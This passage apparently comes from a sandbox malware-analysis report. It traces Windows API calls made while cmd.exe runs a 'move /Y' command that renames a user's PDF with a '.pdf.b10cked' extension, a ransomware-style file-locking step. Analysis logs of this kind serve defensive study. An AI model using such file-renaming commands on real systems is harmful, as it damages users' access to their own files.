end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15466 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15467 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 15468 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 15469 start_va = 0x2e0000 end_va = 0x2e0fff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 15470 start_va = 0x2f0000 end_va = 0x2f0fff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 15471 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 15472 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 15473 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Thread: id = 226 os_tid = 0xf44 [0139.983] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16faf4 | out: lpSystemTimeAsFileTime=0x16faf4*(dwLowDateTime=0x8d5e4820, dwHighDateTime=0x1d440a9)) [0139.983] GetCurrentProcessId () returned 0xf54 [0139.983] GetCurrentThreadId () returned 0xf44 [0139.983] GetTickCount () returned 0x2bfb5 [0139.983] QueryPerformanceCounter (in: lpPerformanceCount=0x16faec | out: lpPerformanceCount=0x16faec*=19677231072) returned 1 [0139.984] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0139.984] __set_app_type (_Type=0x1) [0139.984] __p__fmode () returned 0x76b331f4 [0139.984] __p__commode () returned 0x76b331fc [0139.984] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0139.984] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0139.984] GetCurrentThreadId () returned 0xf44 [0139.984] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf44) returned 0x38 [0139.984] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0139.984] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0139.984] SetThreadUILanguage (LangId=0x0) returned 0x409 [0139.984] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0139.984] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fa84 | out: phkResult=0x16fa84*=0x0) returned 0x2 [0139.985] VirtualQuery (in: lpAddress=0x16fabb, lpBuffer=0x16fa54, dwLength=0x1c | out: lpBuffer=0x16fa54*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0139.985] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fa54, dwLength=0x1c | out: lpBuffer=0x16fa54*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0139.985] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fa54, dwLength=0x1c | out: lpBuffer=0x16fa54*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0139.985] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fa54, dwLength=0x1c | out: lpBuffer=0x16fa54*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0139.985] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fa54, dwLength=0x1c | out: lpBuffer=0x16fa54*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0139.985] GetConsoleOutputCP () returned 0x1b5 [0139.985] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0139.985] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0139.985] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.985] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0139.985] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.985] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0139.985] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.985] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0139.985] _get_osfhandle (_FileHandle=0) returned 0x3 [0139.985] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0139.986] _get_osfhandle (_FileHandle=0) returned 0x3 [0139.986] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0139.986] GetEnvironmentStringsW () returned 0x1f0240* [0139.986] FreeEnvironmentStringsW (penv=0x1f0240) returned 1 [0139.986] GetEnvironmentStringsW () returned 0x1f0240* [0139.986] FreeEnvironmentStringsW (penv=0x1f0240) returned 1 [0139.986] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e9f4 | out: phkResult=0x16e9f4*=0x40) returned 0x0 [0139.986] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e9fc, lpData=0x16ea00, lpcbData=0x16e9f8*=0x1000 | out: lpType=0x16e9fc*=0x0, lpData=0x16ea00*=0xf0, lpcbData=0x16e9f8*=0x1000) returned 0x2 [0139.986] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e9fc, lpData=0x16ea00, lpcbData=0x16e9f8*=0x1000 | out: lpType=0x16e9fc*=0x4, lpData=0x16ea00*=0x1, lpcbData=0x16e9f8*=0x4) returned 0x0 [0139.986] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e9fc, lpData=0x16ea00, lpcbData=0x16e9f8*=0x1000 | out: lpType=0x16e9fc*=0x0, lpData=0x16ea00*=0x1, lpcbData=0x16e9f8*=0x1000) returned 0x2 [0139.986] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e9fc, lpData=0x16ea00, lpcbData=0x16e9f8*=0x1000 | out: lpType=0x16e9fc*=0x4, lpData=0x16ea00*=0x0, lpcbData=0x16e9f8*=0x4) returned 0x0 [0139.986] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e9fc, lpData=0x16ea00, lpcbData=0x16e9f8*=0x1000 | out: lpType=0x16e9fc*=0x4, lpData=0x16ea00*=0x40, lpcbData=0x16e9f8*=0x4) returned 0x0 [0139.986] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e9fc, lpData=0x16ea00, lpcbData=0x16e9f8*=0x1000 | out: lpType=0x16e9fc*=0x4, lpData=0x16ea00*=0x40, lpcbData=0x16e9f8*=0x4) returned 0x0 [0139.986] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e9fc, lpData=0x16ea00, lpcbData=0x16e9f8*=0x1000 | out: lpType=0x16e9fc*=0x0, lpData=0x16ea00*=0x40, lpcbData=0x16e9f8*=0x1000) returned 0x2 [0139.986] RegCloseKey (hKey=0x40) returned 0x0 [0139.986] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e9f4 | out: phkResult=0x16e9f4*=0x40) returned 0x0 [0139.987] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e9fc, lpData=0x16ea00, lpcbData=0x16e9f8*=0x1000 | out: lpType=0x16e9fc*=0x0, lpData=0x16ea00*=0x40, lpcbData=0x16e9f8*=0x1000) returned 0x2 [0139.987] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e9fc, lpData=0x16ea00, lpcbData=0x16e9f8*=0x1000 | out: lpType=0x16e9fc*=0x4, lpData=0x16ea00*=0x1, lpcbData=0x16e9f8*=0x4) returned 0x0 [0139.987] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e9fc, lpData=0x16ea00, lpcbData=0x16e9f8*=0x1000 | out: lpType=0x16e9fc*=0x0, lpData=0x16ea00*=0x1, lpcbData=0x16e9f8*=0x1000) returned 0x2 [0139.987] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e9fc, lpData=0x16ea00, lpcbData=0x16e9f8*=0x1000 | out: lpType=0x16e9fc*=0x4, lpData=0x16ea00*=0x0, lpcbData=0x16e9f8*=0x4) returned 0x0 [0139.987] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e9fc, lpData=0x16ea00, lpcbData=0x16e9f8*=0x1000 | out: lpType=0x16e9fc*=0x4, lpData=0x16ea00*=0x9, lpcbData=0x16e9f8*=0x4) returned 0x0 [0139.987] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e9fc, lpData=0x16ea00, lpcbData=0x16e9f8*=0x1000 | out: lpType=0x16e9fc*=0x4, lpData=0x16ea00*=0x9, lpcbData=0x16e9f8*=0x4) returned 0x0 [0139.987] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e9fc, lpData=0x16ea00, lpcbData=0x16e9f8*=0x1000 | out: lpType=0x16e9fc*=0x0, lpData=0x16ea00*=0x9, lpcbData=0x16e9f8*=0x1000) returned 0x2 [0139.987] RegCloseKey (hKey=0x40) returned 0x0 [0139.987] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636e [0139.987] srand (_Seed=0x5b88636e) [0139.987] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\TGRDF2~1.PDF\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\tgRDf2UBQ_aR.pdf.b10cked\"" [0139.987] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\TGRDF2~1.PDF\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\tgRDf2UBQ_aR.pdf.b10cked\"" [0139.987] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.987] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1f19a0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0139.987] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0139.987] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0139.987] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0139.987] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0139.988] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0139.988] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0139.988] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0139.988] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0139.988] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0139.988] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0139.988] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0139.988] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0139.988] GetEnvironmentStringsW () returned 0x1f2390* [0139.988] FreeEnvironmentStringsW (penv=0x1f2390) returned 1 [0139.988] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.988] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0139.988] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0139.988] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0139.988] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0139.988] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0139.988] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0139.988] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0139.988] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0139.988] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0139.988] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f7c0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.988] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f7c0, lpFilePart=0x16f7bc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f7bc*="Desktop") returned 0x18 [0139.988] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0139.989] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f53c | out: lpFindFileData=0x16f53c) returned 0x1f00d0 [0139.989] FindClose (in: hFindFile=0x1f00d0 | out: hFindFile=0x1f00d0) returned 1 [0139.989] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f53c | out: lpFindFileData=0x16f53c) returned 0x1f00d0 [0139.989] FindClose (in: hFindFile=0x1f00d0 | out: hFindFile=0x1f00d0) returned 1 [0139.989] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f53c | out: lpFindFileData=0x16f53c) returned 0x1f00d0 [0139.989] FindClose (in: hFindFile=0x1f00d0 | out: hFindFile=0x1f00d0) returned 1 [0139.989] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0139.989] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0139.989] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0139.989] GetEnvironmentStringsW () returned 0x1f2bb0* [0139.989] FreeEnvironmentStringsW (penv=0x1f2bb0) returned 1 [0139.989] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.990] GetConsoleOutputCP () returned 0x1b5 [0139.990] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0139.990] GetUserDefaultLCID () returned 0x409 [0139.990] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0139.990] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f900, cchData=128 | out: lpLCData="0") returned 2 [0139.990] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f900, cchData=128 | out: lpLCData="0") returned 2 [0139.990] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f900, cchData=128 | out: lpLCData="1") returned 2 [0139.990] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0139.990] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0139.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0139.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0139.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0139.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0139.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0139.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0139.991] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0139.991] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0139.991] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0139.992] GetConsoleTitleW (in: lpConsoleTitle=0x1e0958, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.992] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0139.992] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0139.992] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0139.992] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0139.992] _wcsicmp (_String1="move", _String2=")") returned 68 [0139.993] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0139.993] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0139.993] _wcsicmp (_String1="IF", _String2="move") returned -4 [0139.993] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0139.993] _wcsicmp (_String1="REM", _String2="move") returned 5 [0139.993] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0139.996] GetConsoleTitleW (in: lpConsoleTitle=0x16f5f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.997] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0139.997] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0139.997] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0139.997] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0139.997] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0139.997] _wcsicmp (_String1="move", _String2="CD") returned 10 [0139.997] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0139.997] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0139.997] _wcsicmp (_String1="move", _String2="REN") returned -5 [0139.997] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0139.997] _wcsicmp (_String1="move", _String2="SET") returned -6 [0139.997] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0139.997] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0139.997] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0139.997] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0139.997] _wcsicmp (_String1="move", _String2="MD") returned 11 [0139.997] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0139.997] _wcsicmp (_String1="move", _String2="RD") returned -5 [0139.997] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0139.997] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0139.997] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0139.997] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0139.997] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0139.997] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0139.997] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0139.997] _wcsicmp (_String1="move", _String2="VER") returned -9 [0139.997] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0139.997] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0139.997] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0139.997] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0139.997] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0139.997] _wcsicmp (_String1="move", _String2="START") returned -6 [0139.997] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0139.997] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0139.997] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0139.999] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0139.999] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0139.999] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f3b4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f3ac, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f3ac*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0139.999] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0140.000] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0140.000] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0140.000] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0140.000] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0140.000] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0140.000] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0140.000] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0140.000] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0140.000] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0140.000] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0140.000] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0140.000] _wcsicmp (_String1="TGRDF2~1.PDF", _String2=".") returned 70 [0140.000] _wcsicmp (_String1="TGRDF2~1.PDF", _String2="..") returned 70 [0140.000] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\TGRDF2~1.PDF" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\tgrdf2~1.pdf")) returned 0x20 [0140.000] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1f20d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.000] SetErrorMode (uMode=0x0) returned 0x0 [0140.000] SetErrorMode (uMode=0x1) returned 0x0 [0140.001] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\TGRDF2~1.PDF", nBufferLength=0x104, lpBuffer=0x16ed3c, lpFilePart=0x16ed24 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\TGRDF2~1.PDF", lpFilePart=0x16ed24*="TGRDF2~1.PDF") returned 0x48 [0140.001] SetErrorMode (uMode=0x0) returned 0x1 [0140.001] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1")) returned 0x12 [0140.001] _wcsicmp (_String1="TGRDF2~1.PDF", _String2=".") returned 70 [0140.001] _wcsicmp (_String1="TGRDF2~1.PDF", _String2="..") returned 70 [0140.001] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\TGRDF2~1.PDF" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\tgrdf2~1.pdf")) returned 0x20 [0140.001] SetErrorMode (uMode=0x0) returned 0x0 [0140.001] SetErrorMode (uMode=0x1) returned 0x0 [0140.001] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\TGRDF2~1.PDF", nBufferLength=0x104, lpBuffer=0x16f1b8, lpFilePart=0x16ef50 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\TGRDF2~1.PDF", lpFilePart=0x16ef50*="TGRDF2~1.PDF") 